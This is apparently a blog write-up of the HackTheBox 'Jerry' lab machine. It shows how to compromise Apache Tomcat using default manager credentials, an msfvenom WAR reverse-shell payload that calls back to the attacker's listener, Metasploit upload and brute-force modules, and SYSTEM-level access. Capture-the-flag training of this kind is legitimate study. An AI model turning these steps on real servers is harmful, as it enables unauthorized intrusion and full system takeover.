Jerry — HackTheBox writeup

4 min readOct 7, 2020


Another machine from the Mayor’s and TJnull’s OSCP list. This is an easy one which can be done in two different ways and we will take a look at both.

Let’s scan the IP we have with nmap to enumerate the ports and services.

sudo nmap -sS -sC -sV -oA jerry

We have port 8080 open and it’s running Apache Tomcat.

Going to the page shows the default page. Something we see is: “If you’re seeing this, you’ve successfully installed Tomcat. Congratulations!”. This means it’s probably a fresh install.

Choosing “Server Status”, “Manager App” or “Host Manager” will bring up a login popup and if you cancel out of it you will be redirected.

We see the credentials tomcat:s3cret

And you get logged in.

There is an option to deploy WAR files.

Generate a WAR payload with msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.X.X LPORT=9001 -f war > shell.war

Once that’s done you can select your shell and deploy it.

When it’s uploaded you will see it in the list of applications.

Reload it, fire up a netcat listener and then navigate to /shell.

You should receive a connection as NT AUTHORITY\SYSTEM.

Navigating to the Administrator folder we see a “flags” directory.

We get two flags at the price of one ¯\_(ツ)_/¯

You can also go through the box with metasploit. Start metasploit.


And search for “tomcat”

We see authenticated upload code execution. Select it and set the options.

I set the HttpPassword, HttpUsername, RHOSTS and RPORT. Run it and you should get a meterpreter shell.

We can pop a shell and we would be running as Administrator.

If you did not try and login in the manager page to find the credentials there is a metasploit module that would have found the username and password. It is “auxiliary/scanner/http/tomcat_mgr_login”. We select it and set the options. In this case it would be only the target IP.

Running the exploit tries to brute-force the login page.

Eventually it will find the password.

That was pretty much it for Jerry. I hope you enjoyed the machine and the writeup. Cya around.




Jack of all trades — master of none.